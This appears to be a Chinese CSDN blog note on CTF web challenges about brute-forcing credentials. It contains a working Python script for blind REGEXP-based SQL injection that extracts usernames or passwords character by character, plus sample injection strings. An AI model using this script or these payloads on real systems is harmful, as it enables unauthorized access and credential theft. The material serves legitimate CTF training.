CTF web题总结--爆破用户名密码

最新推荐文章于 2024-07-19 21:17:45 发布
最新推荐文章于 2024-07-19 21:17:45 发布
阅读量1w 收藏 12
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_20817327/article/details/77744632
版权

1、burp爆破用户名密码
2、id,userid,useId多试几次
3、爆破后台目录,index.php,users.php,login.php,flag.php
4、脚本:

# -*- coding:utf-8 -*-
import httplib
import re
import urllib

class Attacker:

    def __init__(self, mode, url):

        self.url = url
        self.domin = self.get_domin()
        self.mode = mode
        str1 = []
        for i in range(26):
            str1.append(chr(ord('a') + i))
        for i in range(26):
            str1.append(chr(ord('A') + i))
        for i in range(10):
            str1.append(chr(ord('0') + i))
        self.str_box = str1

    def get_domin(self):
        url = self.url
        url_a = url.split('://')
        if re.match('^http',url_a[0]):

            url = url_a[1]
        else:
            url = url_a[0]
        url_a = url.split('/')
        domin = url_a[0]
        return domin

    def crack(self):
        conn = httplib.HTTPConnection(self.domin)
        if self.mode == 1:
            aim = 'username'
        if self.mode == 2:
            aim = 'password'
        url = self.url
        attack_url1 = urllib.quote('\' or ' + aim + ' regexp \'')
        attack_url2 = urllib.quote('\' #')
        str_box = self.str_box

        try:
            string = '^'
            while True:
                for str_end in str_box:
                    url_to_attack = url + attack_url1 + string + str_end + attack_url2 
                    #print url_to_attack
                    conn.request(method="GET", url=url_to_attack)
                    response = conn.getresponse()
                    res = response.read()
                    if res.find('useless') > 0:
                        string = string + str_end
                        str_end = -1
                        print string[1:] #如果想看到破进程,取消此段注释
                        break
                if str_end != -1 and str_end == '9': 
                    break


            self.name = string
            print self.name[1:]

        except:
            print "Something Wrong"
            print url

def main():
    attack_url = 'http://10.200.91.28/zebCTF/users.php?userId=2'
    attacker = Attacker(2, attack_url) #1为用户名注入,2为密码注入
    attacker.crack()

if __name__ == '__main__':
    main()

正则注入

userId=2%27%20or username REGEXP '^A' %23
userId=2%27%20or username REGEXP '^a' %23
userId=2%27%20or username REGEXP '^Z' %23
bob62856
关注
  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网络安全CTF系列培训教程之Web篇-burpsuite爆破密码
2401_84300255的博客
04-27 1072
最后,点击Start attack 按钮,开始爆破攻击,等待片刻后,点击Length,根据返回web返回数据包字节长度进行排序,因为登录成功与登录不成功的web返回数据包字节长度肯定不一样,排序不同的那个即为爆破成功的密码。在师资力量,教学资源,学习环境,课程设置上均比自学有一定的优势。报名微信:ctfayang。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。
ctf-web--总结几点基础的做思路
热门推荐
Sanky0u的博客
08-14 2万+
做了三天web了,因为刚入门,还是不要做得太快,先把前几天学到的好好总结一下,一部分是做的几道bugku上的web,一部分是合天网安上面做的几道web,这篇博客就先介绍第一部分。 1. 看源码可以右键->【查看网页源代码】,也可以用火狐和谷歌浏览器的按F12键,按F12键可以修改html源代码方便构造一些值提交,但如果不需要的话直接右键查看源代码更直观,看网页里面的注释之类的都很方便。 2.
ctf列移位密码自动暴破
12-01
ctfctf列移位密码自动暴破,在使用栅栏和变异栅栏破解无果的情况下,可以使用这个脚本试一下,需要手动修改脚本中密文、列数和明文首字母,
简单的CTF web密码爆破
Saber12_3_4的博客
11-23 3272
ctf中简单的爆破以及BurpUnlimited的使用
CTF-web 弱口令爆破
最新发布
2302_80276789的博客
07-19 362
作为一名网络空间安全的学习者,ctf无疑是一个很好的学习途径,因此从上学期开始时便计划着去学习ctf,但是由于自身原因一拖再拖,在这个暑假,下定决心开始进行ctf的正是学习。以下是我的学习的笔记。
CTF-暴力破解
su__xiaoyan的博客
01-06 1927
暴力破解 web安全中的暴力破解俗称穷举法或者枚举法,就是利用尝试所有的可能性最终获取正确的结果的一种攻击方式。 暴力破解的攻击思路: 通过暴力破解获取web应用程序的后台登录用户名密码,通过网站后台漏洞getshell,然后提权获取系统的最高权限。 靶场环境 攻击者:Kali Linux(192.168.0.19) Ubuntu(64-bit)(192.168.0.250) 实验流程 端口扫描、信息探测 命令:nmap -sV IP地址 //探测靶机开放端口、运行服务以及对应版本 开放80,
CTF 绕过前端JS加密进行密码爆破
baynk的博客
03-23 2937
这头像真是骚气的。。。 随意输入了下用户名密码,有提示 再试了下admin 看来用户名已经OK了,关键是密码了,直接丢Burp中去。 发现密码好像被加密了,那就只有可能是前端来完加密的,先去前端找JS. 这个有个Base64。。刚刚开始我以为就是通用的base64,于是去用burpsuite中自带的加密进行处理。。 结果自然悲剧了,,,因为没跑同来,自己去查了下JS,JS好像没有自带b...
Python 验证码 crunch|狼组CTF 有验证码后台账号密码爆破
tempulcc的博客
08-31 1243
本文通过一道狼组ctf目,讲解通过crunch生成字典,对有验证码的网站后台进行账号密码破解,后续还更新了多线程的脚本文件,脚本文件在我的资源里可以下载。
CTFCTFHub------web-密码口令-弱口令/默认口令
从零开始的网安生活
07-23 2031
文章目录密码口令弱口令默认口令相关知识 密码口令 弱口令 1.输入任意用户名密码,捕获 2.使用自己的字典对password进行爆破,观察长度不同,response获得flag 默认口令 1.打开链接,查看源码,获得关键信息 2.直接搜索默认口令,登录获得flag 相关知识 常见网络安全设备弱口令(默认口令) ...
2021-06-24CTF-攻防世界-WEB新手练习区(12入门
u258710的博客
06-24 2565
CTF-攻防世界-WEB新手练习区(12入门)01-view_source02-robots03-backup04-cookie05-disabled_button06-weak_auth07-simple_php08-get_post09-xff_referer10-webshell11-command_execution12-simple_js 01-view_source 目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 目提示查看网页源代码,但鼠标右键不管用
CTFHUB技能树--web前置--HTTP协议(入门级详细wp)
weixin_58391382的博客
10-23 481
本文仅记录本人自己写ctfhub技能树的过程,仅供参考,如有错误还请大佬在评论区指正 目录 请求方式 302跳转 Cookie 基础认证 请求方式 先看下目要求 翻译一下: HTTP方法是GET 使用CTF**B方法,我会给你标志。 提示:如果您得到“HTTP方法不允许”错误,您应该请求index.php。 直接根据提示brup抓包更改头部即可 302跳转 打开后界面 翻译一下: 这里 没有flag 给我flag ...
ctf 密码工具
07-30
ctf 密码类工具 各种加密解密都支持 编码转换 古典密码
CTF多功能密码破解(需java环境)
02-09
CTF的小工具,实用方便,可支持多种古典密码,多种编码方式。
CTF工具包-密码攻击
04-20
各种对于密码的攻击利用工具,包含字典生成器、rsatools、ewsa等等
常用的用户名爆破字典
01-08
该资源是抓包时常用的用户名爆破字典,资源仅供学习参考使用,切勿用于非法用途,谢谢!
BUUCTF——BUU BRUPT(密码爆破
Zichel77的博客
08-18 914
用户名密码分别报错,因此可以确定用户名爆破。猜测用户名点击Submit得到回显。点开是一个简单的登陆页面。破解到正确密码时自动停止。尝试输入看看错误回显。于是编写脚本进行爆破。...
CTF-暴力破解【超详细】
不知名白帽的博客
08-27 5100
CTF-暴力破解【超详细】
网络安全CTF系列培训教程之Web篇-burpsuite爆破密码,2024年网络安全大厂面试分享
m0_60707685的博客
04-07 1056
品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**
网络安全最新BUUCTF BUU SQL COURSE 1_ctf sql 只提示用户名密码错误,天呐
2401_84254087的博客
05-15 245
通过判断可知contents表应为热点新闻的数据表,admin大概率为用户表,所以我们构建sql根据表名查询该表下的各字段名,成功得到字段名:id,username,password。然后我们构造order by sql语句验证该数据表中共有几列数据,当我们order by 3时,列表为空,而order by 2时,列表有数据,则证明该数据表中只有两列。根据数据库名,我们可以在源数据库information_schema中查到该数据库的所有表名,当前查到一共两张表,admin和contents表。
CTF Web理论基础篇-第二课:工具集与php弱类型
综上所述,本文总结了《002-CTF web理论基础篇-第二课理论基础.pdf》和《002-CTF web理论基础篇-第二课理论基础》中的内容,包括CTF网页型的工具集和理论基础。同时,我们也了解了php的弱类型特性和类型转换...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值